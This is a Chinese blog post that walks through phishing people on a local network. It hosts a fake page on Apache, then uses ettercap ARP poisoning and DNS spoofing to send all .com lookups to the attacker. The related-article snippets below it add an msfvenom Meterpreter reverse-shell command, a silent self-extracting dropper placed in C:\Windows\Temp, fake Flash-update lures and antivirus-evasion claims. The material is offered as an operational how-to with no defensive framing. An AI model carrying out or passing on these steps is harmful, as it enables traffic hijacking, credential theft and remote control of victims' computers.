内网flash钓鱼

最新推荐文章于 2024-07-23 18:01:43 发布
最新推荐文章于 2024-07-23 18:01:43 发布
阅读量784 收藏 4
点赞数 1
分类专栏: 钓鱼系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44110913/article/details/108976490
版权

内网flash钓鱼

操作流程:注意:该方法只支持http的网页

  • 开启apache服务并挂上钓鱼页面,在var/www/html下即可,或者自己创建,可百度如何操作
  • vim /etc/ettercap/etter.dns
  • .开启ettercap -G

在这里插入图片描述

  • 修改:vim /etc/ettercap/etter.dns
  • 添加想钓鱼的域名,修改图中红线位置,比如钓鱼www.baidu.com 到我们的ip,受害者访问百度时候就会解析到我们的钓鱼网页
  • 该位置我们设置为所有com结尾的网站

在这里插入图片描述

  • 查看受害者的ip

在这里插入图片描述

配置ettercap

  • target1:放受害者的ip
  • target2:放网关,通常两个都选上

在这里插入图片描述

  • 开启arp攻击

在这里插入图片描述
在这里插入图片描述

  • 开启dns欺骗

在这里插入图片描述
在这里插入图片描述

开启成功
在这里插入图片描述

  • 回过头来ping 带com的网页,可以看到解析到我们的ip

在这里插入图片描述

  • 访问任何以com结尾的网页统统解析为我们的钓鱼页面

在这里插入图片描述

Mamba start
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一张图告诉你,如何渗入企业内网
07-10 2万+
渗入企业内网,成功获得起始攻击点,这就是一个很有意思的话题,因为有各种有趣的攻击方式。对攻击者来说,攻击是一种成本,选择一条成功率高的攻击路径尤为重要,这个路径就是一种攻击策略。而对于防...
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 246
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
Fake-flash.cn:flash.cn钓鱼页(中文+英文)
02-03
Fake-flash.cn:flash.cn钓鱼页(中文+英文)
简单的Flash钓鱼页面跳转
Naiisii的博客
01-12 472
环境win7虚拟机 本机 过程 在win7虚拟机内: PHP打开js文件,将href改为虚拟机IP的网页 回到本机,在www目录下新建一个html PHP打开html文件,插入跳转到虚拟机网页的XSS 访问本机的html网页 会发现跳转到了虚拟机IP ...
干货! | Flash钓鱼手法分享
2301_80115097的博客
07-11 290
前几天看了一篇土司的实战文章,操作骚的一批,而且师傅把钓鱼源码传到了github上我拿过来研究一下
Flash钓鱼讲解
越努力 越自由
05-31 995
flash钓鱼
xxs-flash-钓鱼
qq_38618396的博客
12-27 779
0x00 准备 1、源码:https://github.com/r00tSe7en/Fake-flash.cn 2、域名:一个和flash相近的域名和一台服务器 3、木马:cobalstrike生成木马 4、其他:flash安装包 0x01 实际操作 搭建环境 第一步:下载源代码,直接在使用phpstudy搭建一个网站: 第二步:启动cs,制作木马 使用cs生成一个木马 第三步:下载flash安装程序 在这里插入图片描述 ...
内网钓鱼系统搭建及演练-blackeye
流浪法师的博客
02-23 2035
内网钓鱼系统搭建及演练-blackeye
螣龙安科笔记:内网渗透测试(三)
katekatezzzzz的博客
05-27 1446
经过前两篇文章的介绍,相信大家对于内网渗透测试的一些基础知识已经有了足够的了解,这篇文章就将带你一起来了解内网渗透测试的全过程。 (四)内网渗透流程 1.渗透工具准备 1.1扫描工具 1.1.1主动扫描工具 web应用漏洞扫描器:用于web项目的安全测试工具,扫描网站所有url,自动测试是否存在各种类型的漏洞。如:AWVS、appscan 综合漏洞扫描器:集合了多种功能的漏洞扫描器。如Fux iscanner,具有如下功能:漏洞检测和管理,验证测试程序,IT资产发现和管理,端口扫描器,子域扫描器
红队作业 | 社会工程学实践 之 手把手教你钓鱼
Ms08067安全实验室
01-19 1936
文章来源|MS08067 红队培训班 第5期本文作者:aeqaq(红队培训班5期学员)按老师要求尝试完成布置的作业如下:1. 邮件钓鱼1.1 选择服务器telnet smtp.qq.com...
手把手教你DNS劫持挂马
Ms08067安全实验室
03-12 7004
文章来源|MS08067 内网安全知识星球本文作者:BlackCat(Ms08067内网安全小组成员)内网纵横四海 认准Ms08067首先学习DNS劫持之前,务必要了解下DNS是个什么玩...
Flash-Pop:Flash钓鱼弹窗优化版
02-03
Flash-Pop:Flash钓鱼弹窗优化版
flash动画小猫钓鱼
03-31
一个动画一个动画一个动画一个动画一个动画
内网渗透-cs之钓鱼测试攻击
lza20001103的博客
05-08 3161
cs之模拟钓鱼攻击
Flash水坑钓鱼
god_Zeo的安全博客
02-06 5994
Flash水坑钓鱼起因准备先配置一个马子吧自解压捆绑文件的利用上传到服务器常见用法 起因 在网络上看到许多大佬都拿这个钓鱼,而且感觉成功率贼高。 未雨绸缪,先测试一下,以后肯定用的到 准备 flash官网的钓鱼源码:https://github.com/r00tSe7en/Fake-flash.cn 一个服务器 一个域名 一个马子 先配置一个马子吧 使用常用的CS吧,随便来一个,成功上线 关于...
xss flash钓鱼拿到主机控制权 教程
最新发布
weixin_57682301的博客
07-23 298
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7(改成自己虚拟机IP) LPORT=4444 -f exe > shell.exe。将两个⽂件⼀块压缩并更改⽂件名为"Download.exe"并且将压缩包命名为download.exe。标签卡点高级进入自解压选项将解压路径设置为--C:\Windows\Temp并且做如下设置。首先来到xss平台 点击公共模块---flash弹窗钓⻥-查看。生成shell.exe的文件。
Xss——Flash钓鱼
weixin_56291508的博客
04-22 750
Xss——Flash钓鱼
Flash钓鱼->CS上线(免杀过火绒、360等)
热门推荐
weixin_54227009的博客
05-13 1万+
这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了。这里砸门为了逼真一点,所以把这个压缩包的图标改成Flash的图标。3、将免杀的exe跟生成的PayloadFile进行压缩。5、将这个exe的压缩包的路径放在砸门服务器上的flash.js上即可。执行路径为:C:\Windows\Temp\Flash.exe。3.4、高级->模式->静默模式->全部隐藏。这里我把解压路径给改成了:C:\Windows\Temp。3.2、 高级->常规->解压路径。
红队钓鱼技术之Flash网页钓鱼
xf555er的博客
08-07 479
Flash钓鱼攻击是一种网络攻击手段,旨在欺骗用户访问伪造的Flash更新页面,并诱使他们下载并安装恶意软件。这种攻击通常利用用户对Flash更新的需求,以及对合法更新网站的信任。攻击者通常会模仿Adobe Flash Player的官方更新页面,以提高诱骗成功率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值